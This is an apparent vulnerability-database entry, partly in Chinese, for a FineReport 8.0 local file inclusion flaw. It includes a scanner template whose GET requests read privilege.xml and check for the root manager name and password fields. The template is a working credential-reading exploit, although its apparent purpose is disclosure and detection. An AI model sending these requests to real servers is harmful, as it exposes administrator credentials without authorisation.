finereport-path-traversal: FineReport 8.0 - Local File Inclusion

日期: 2025-08-01 | 影响软件: FineReport 8.0 | POC: 已公开

漏洞描述

FIneReport 8.0 is vulnerable to local file inclusion.

PoC代码[已公开]

id: finereport-path-traversal

info:
  name: FineReport 8.0 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: FIneReport  8.0 is vulnerable to local file inclusion.
  reference:
    - https://web.archive.org/web/20200506020241/http://foreversong.cn/archives/1378
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: finereport,lfi,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
      - "{{BaseURL}}/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<rootManagerName>"
          - "<rootManagerPassword>"
        part: body
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e06d0ff7da9a665252669d493eab76d5d3baf3c6578cd2c93d1a77ee988b1a3c022100c67e35eda1fa09a0a0162c09c62980de17538512e88709204726dbb29d36972f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐